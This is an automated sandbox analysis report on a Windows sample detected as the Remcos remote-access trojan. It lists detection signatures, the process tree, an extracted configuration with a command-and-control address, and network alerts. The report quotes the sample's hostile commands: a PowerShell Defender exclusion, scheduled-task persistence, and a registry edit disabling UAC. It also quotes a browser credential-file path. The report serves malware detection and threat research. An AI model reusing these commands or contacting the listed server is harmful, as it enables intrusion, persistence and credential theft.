Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Analysis ID:1500386
MD5:b8896a4d1adbefcc7fe4cac53b134968
SHA1:e7a68f4c1ac47ecc6cc43b12dc82651cff63f670
SHA256:7815d02dd41dd657438b4b226f4ac1a33d6a37159e34448627088e1354f9ab69
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe (PID: 3884 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe" MD5: B8896A4D1ADBEFCC7FE4CAC53B134968)
    • powershell.exe (PID: 4416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2620 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • bmkNCLNkqvOpVZ.exe (PID: 1616 cmdline: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe MD5: B8896A4D1ADBEFCC7FE4CAC53B134968)
    • schtasks.exe (PID: 3940 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • bmkNCLNkqvOpVZ.exe (PID: 6204 cmdline: "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe" MD5: B8896A4D1ADBEFCC7FE4CAC53B134968)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "172.93.220.148:45682:0", "Assigned name": "3456789", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "765-8M14I5", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
    • 0x691e0:$a1: Remcos restarted by watchdog!
    • 0x69738:$a3: %02i:%02i:%02i:%03i
    • 0x69abd:$a4: * Remcos v
    0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
    • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6320c:$str_b2: Executing file:
    • 0x64328:$str_b3: GetDirectListeningPort
    • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x63e30:$str_b7: \update.vbs
    • 0x63234:$str_b9: Downloaded file:
    • 0x63220:$str_b10: Downloading file:
    • 0x632c4:$str_b12: Failed to upload file:
    • 0x642f0:$str_b13: StartForward
    • 0x64310:$str_b14: StopForward
    • 0x63dd8:$str_b15: fso.DeleteFile "
    • 0x63d6c:$str_b16: On Error Resume Next
    • 0x63e08:$str_b17: fso.DeleteFolder "
    • 0x632b4:$str_b18: Uploaded file:
    • 0x63274:$str_b19: Unable to delete:
    • 0x63da0:$str_b20: while fso.FileExists("
    • 0x63749:$str_c0: [Firefox StoredLogins not found]
    0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
    • 0x63100:$s1: \Classes\mscfile\shell\open\command
    • 0x63160:$s1: \Classes\mscfile\shell\open\command
    • 0x63148:$s2: eventvwr.exe
    00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      Click to see the 9 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpackWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x661e0:$a1: Remcos restarted by watchdog!
        • 0x66738:$a3: %02i:%02i:%02i:%03i
        • 0x66abd:$a4: * Remcos v
        0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpackREMCOS_RAT_variantsunknownunknown
        • 0x611e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6020c:$str_b2: Executing file:
        • 0x61328:$str_b3: GetDirectListeningPort
        • 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x60e30:$str_b7: \update.vbs
        • 0x60234:$str_b9: Downloaded file:
        • 0x60220:$str_b10: Downloading file:
        • 0x602c4:$str_b12: Failed to upload file:
        • 0x612f0:$str_b13: StartForward
        • 0x61310:$str_b14: StopForward
        • 0x60dd8:$str_b15: fso.DeleteFile "
        • 0x60d6c:$str_b16: On Error Resume Next
        • 0x60e08:$str_b17: fso.DeleteFolder "
        • 0x602b4:$str_b18: Uploaded file:
        • 0x60274:$str_b19: Unable to delete:
        • 0x60da0:$str_b20: while fso.FileExists("
        • 0x60749:$str_c0: [Firefox StoredLogins not found]
        0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
        • 0x60100:$s1: \Classes\mscfile\shell\open\command
        • 0x60160:$s1: \Classes\mscfile\shell\open\command
        • 0x60148:$s2: eventvwr.exe
        14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 20 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", ProcessId: 4416, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", ProcessId: 4416, ProcessName: powershell.exe
          Sigma detected: Suspicious Add Scheduled Task Parent
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, ParentImage: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe, ParentProcessId: 1616, ParentProcessName: bmkNCLNkqvOpVZ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp", ProcessId: 3940, ProcessName: schtasks.exe
          Sigma detected: Suspicious Schtasks From Env Var Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", ProcessId: 2620, ProcessName: schtasks.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe", ProcessId: 4416, ProcessName: powershell.exe

          Persistence and Installation Behavior

          barindex
          Sigma detected: Scheduled temp file as task from temp location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ParentProcessId: 3884, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp", ProcessId: 2620, ProcessName: schtasks.exe

          Suricata Signatures

          Timestamp:2024-08-28T11:37:58.812561+0200
          SID:2032777
          Severity:1
          Source Port:45682
          Destination Port:49712
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-28T11:37:57.926996+0200
          SID:2032776
          Severity:1
          Source Port:49712
          Destination Port:45682
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-28T11:40:00.330083+0200
          SID:2032777
          Severity:1
          Source Port:45682
          Destination Port:49712
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-28T11:42:01.566854+0200
          SID:2032777
          Severity:1
          Source Port:45682
          Destination Port:49712
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-28T11:38:00.275897+0200
          SID:2803304
          Severity:3
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:Unknown Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "172.93.220.148:45682:0", "Assigned name": "3456789", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "765-8M14I5", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeVirustotal: Detection: 32%Perma Link
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeVirustotal: Detection: 32%Perma Link
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,14_2_004315EC
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_33c82500-f
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: snwo.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, bmkNCLNkqvOpVZ.exe.0.dr
          Source: Binary string: snwo.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, bmkNCLNkqvOpVZ.exe.0.dr
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041A01B
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040B28E
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040838E
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004087A0
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00407848
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004068CD FindFirstFileW,FindNextFileW,14_2_004068CD
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0044BA59 FindFirstFileExA,14_2_0044BA59
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040AA71
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00417AAB
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040AC78
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00406D28
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 4x nop then jmp 0739782Eh0_2_07396D4C
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]9_2_070F47A0
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 4x nop then jmp 0A246AD6h9_2_0A245FF4

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49712 -> 172.93.220.148:45682
          Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.93.220.148:45682 -> 192.168.2.6:49712
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: 172.93.220.148
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: XTOM-AS-JPxTomJP XTOM-AS-JPxTomJP
          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49714 -> 178.237.33.50:80
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownTCP traffic detected without corresponding DNS query: 172.93.220.148
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_0041936B
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
